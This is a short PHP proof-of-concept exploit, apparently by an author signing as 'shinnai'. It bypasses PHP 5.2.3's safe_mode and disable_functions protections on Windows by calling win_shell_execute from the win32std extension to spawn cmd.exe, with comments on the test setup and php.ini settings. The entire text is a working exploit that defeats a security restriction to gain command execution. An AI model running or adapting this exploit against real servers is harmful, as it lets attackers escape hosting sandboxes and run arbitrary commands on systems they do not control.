<?php//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass//author: shinnai//mail: shinnai[at]autistici[dot]org//site: http://shinnai.altervista.org//Tested on xp Pro sp2 full patched, worked both from the cli and on apache//Thanks to rgod for all his precious advises :)//I set php.ini in this way://safe_mode = On//disable_functions = system//if you launch the exploit from the cli, cmd.exe will be wxecuted//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanagerif (!extension_loaded("win32std")) die("win32std extension required!");system("cmd.exe"); //just to be sure that protections work wellwin_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");?>